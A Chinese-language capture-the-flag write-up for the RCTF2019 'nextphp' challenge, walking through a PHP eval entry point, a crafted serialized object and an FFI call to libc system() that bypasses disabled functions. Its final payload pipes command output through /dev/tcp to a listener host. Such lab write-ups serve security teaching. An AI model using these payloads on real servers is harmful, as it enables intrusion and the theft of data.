[wp] RCTF2019-nextphp

<?php
if (isset($_GET['a'])) {
    eval($_GET['a']);
} else {
    show_source(__FILE__);
}

尝试利用eval

?a=echo system("ls");

[wp] RCTF2019-nextphp
system()函数被禁止了.
尝试查看phpinfo();

?a=phpinfo();

查看成功,在页面查找disable_functions来查看都有哪些函数被禁用了:
在这里插入图片描述
[wp] RCTF2019-nextphp
接下来使用其中没有过滤的函数进行渗透:

?a=echo var_dump(scandir("/var/www/html/"));

返回结果如下:

  array(4) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(9) "index.php" [3]=> string(11) "preload.php" }

查看preload.php的内容:

?a=echo%20file_get_contents("preload.php");

得到如下代码:

<?php
final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'print_r',
        'arg' => '1'
    ];

    private function run () {
        $this->data['ret'] = $this->data['func']($this->data['arg']);
    }

    public function __serialize(): array {
        return $this->data;
    }

    public function __unserialize(array $data) {
        array_merge($this->data, $data);
        $this->run();
    }

    public function serialize (): string {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        $this->data = unserialize($payload);
        $this->run();
    }

    public function __get ($key) {
        return $this->data[$key];
    }

    public function __set ($key, $value) {
        throw new \Exception('No implemented');
    }

    public function __construct () {
        throw new \Exception('No implemented');
    }
}

利用下面的脚本生成一个序列化对象:

<?php
final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'print_r',
        'arg' => '666'
    ];

    private function run () {
        $this->data['ret'] = $this->data['func']($this->data['arg']);
    }

    public function __serialize(): array {
        return $this->data;
    }

    public function __unserialize(array $data) {
        array_merge($this->data, $data);
        $this->run();
    }

    public function serialize (): string {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        $this->data = unserialize($payload);
        $this->run();
    }

    public function __get ($key) {
        return $this->data[$key];
    }

    public function __set ($key, $value) {
        
    }

    public function __construct () {
       
    }
}
$A = new A();
var_dump(serialize($A))
?>
string(76) "C:1:"A":63:{a:3:{s:3:"ret";N;s:4:"func";s:7:"print_r";s:3:"arg";s:3:"666";}}"

传参:

?a=include(%27preload.php%27);var_dump(unserialize(%27C:1:"A":63:{a:3:{s:3:"ret";N;s:4:"func";s:7:"print_r";s:3:"arg";s:3:"666";}}%27)->__get("ret"));

返回结果如下:
[wp] RCTF2019-nextphp
成功用函数print_r打印出666
然后emmm,实在是想不出来改怎么利用,system,exec这些函数都被禁用了,于是看了看队里之前的wp:
发现一个叫做FFI的拓展

<?php
// create FFI object, loading libc and exporting function printf()
$ffi = FFI::cdef(
    "int printf(const char *format, ...);", // this is regular C declaration
    "libc.so.6");
// call C printf()
$ffi->printf("Hello %s!\n", "world");

那就修改一下之前生成payload的脚本:

?a=include(%27preload.php%27);unserialize(%27C:1:%22A%22:89:{a:3:{s:3:%22ret%22;N;s:4:%22func%22;s:9:%22FFI::cdef%22;s:3:%22arg%22;s:26:%22int%20system(char%20*command);%22;}}%27)-%3E__get(%22ret%22)-%3Esystem(%27bash%20-c%20%22ls%20%3E%20/dev/tcp/监听主机ip/8080%22%27);
发现flag,接下来把命令改成cat /flag即可

[wp] RCTF2019-nextphp

上一篇:初识shiro


下一篇:php数组如何存到数据库中?采用序列化方案serialize() 和 unserialize()